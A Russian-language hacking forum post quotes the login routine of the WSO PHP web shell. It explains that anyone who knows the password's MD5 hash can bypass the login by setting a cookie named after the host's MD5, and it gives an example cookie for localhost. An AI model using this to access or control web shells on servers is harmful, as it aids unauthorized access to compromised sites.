26.05.2017, 11:17
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Dr_Wile
Dr_Wile said:
↑
Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!
Давайте посмотрим в сторону кода самого шела как происходит авторизация:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"63a9f0ea7bb98050796b649e85481845"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//пусть условно будет пароль root
//..........
[/COLOR][COLOR="#007700"]if(!empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#FF8000"]//если присутствует пароль
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#FF8000"]// и пароль равен его хэшь сумме
[/COLOR][COLOR="#0000BB"]WSOsetcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]),[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// отправляем куку с параметром хэшь хоста и значением хэшь пароля
[/COLOR][COLOR="#007700"]if (!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]) || ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] !=[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]();
}[/COLOR][/COLOR]
предположим что у нас HOST: localhost
тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:
421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb980507 96b649e85481845
|
|
|